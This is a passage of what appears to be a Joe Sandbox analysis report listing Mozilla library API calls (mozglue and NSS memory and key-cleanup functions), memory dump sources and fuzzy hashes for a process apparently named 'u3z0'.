                                                                                                                                                                                                                                                                                        • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90ACC0
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90ACDB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C74F20E,?), ref: 6C783DF5
                                                                                                                                                                                                                                                                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C74F20E,00000000,?), ref: 6C783DFC
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C783E06
                                                                                                                                                                                                                                                                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C783E0E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CC00: GetCurrentProcess.KERNEL32(?,?,6C7431A7), ref: 6C77CC0D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7431A7), ref: 6C77CC16
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(?,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC2D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: TlsGetValue.KERNEL32(?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE10
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: EnterCriticalSection.KERNEL32(?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE24
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C88D079,00000000,00000001), ref: 6C8AAE5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE6F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE7F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: TlsGetValue.KERNEL32(?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAEB1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAEC9
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(?,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC44
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC59
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(8CB6FF01,6C8E6AC6,6C8F639C,?,?,?,?,?,?,?,?,?,6C8F5D40,00000000,?,6C8FAAD4), ref: 6C90AC62
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1595327144-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2b76d8db2b5ceb3db712bf032370274ef73e9f09e8979803e52927a873c3a666
                                                                                                                                                                                                                                                                                        • Instruction ID: 8769601636e41422fcd97398b6807df20e1032498a6d83a8ff4a874c96bc738d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b76d8db2b5ceb3db712bf032370274ef73e9f09e8979803e52927a873c3a666
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA018BB56002109FDB10CF28E9C0B8677ACAF14B5DF188468E9499FB06DB30E848CBA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 88d358702449e3305df76f2511affd15ce607cb4afa5c2ecfe253dc97982395a
                                                                                                                                                                                                                                                                                        • Instruction ID: c9c9524b657ccc087bd5cb93b7a44d8903106ebe46c449954094d16bfa9ea759
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88d358702449e3305df76f2511affd15ce607cb4afa5c2ecfe253dc97982395a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2E03076704618ABCB10EFA8DC4888B77ACEF492703150525E691D3700D231F905CBA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7985D3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C798725
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                        • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                        • Opcode ID: 395b1801a9c8a67e954a05367460949540f378eabee3d435d965fd81a986beee
                                                                                                                                                                                                                                                                                        • Instruction ID: 1ac10404ac50e533c001f86a89516b5963be5eea07f2885ce505dd48e9fa7516
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 395b1801a9c8a67e954a05367460949540f378eabee3d435d965fd81a986beee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF5156B46046458FD701CF28D288B5ABBF1BF4A318F18C19AD8599FB52C375E885CF92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C74BDEB
                                                                                                                                                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74BE8F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C783D19
                                                                                                                                                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C783D6C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                                                        • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C7A6E22
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7A6E3F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C7A6E1D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                        • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                        • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C759EEF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID: Infinity$NaN
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kxl,?,6C784B30,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C756C42
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kxl,?,6C784B30,80000000,?,6C784AB7,?,6C7443CF,?,6C7442D2), ref: 6C756C58
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: moz_xmalloc$malloc
                                                                                                                                                                                                                                                                                        • String ID: 0Kxl
                                                                                                                                                                                                                                                                                        • API String ID: 1967447596-239246097
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B628
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(00000000,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C7990FF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7990E0: free.MOZGLUE(?,00000000,00000000,?,6C79B6F6,?,?,?,?,?,6C79B127), ref: 6C799108
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B67D
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C79B2C9,?,00000000,?,6C79B127,?,?,?,?,?,?,?,?,?,6C79AE52), ref: 6C79B708
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C79B127,?,?,?,?,?,?,?,?), ref: 6C79B74D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C796EAB
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C796EFA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C796F1E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C796F5C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C750A4D), ref: 6C7AB5EA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C750A4D), ref: 6C7AB623
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C750A4D), ref: 6C7AB66C
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C750A4D), ref: 6C7AB67F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: malloc$free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C77F611
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C77F623
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C77F652
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C77F668
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%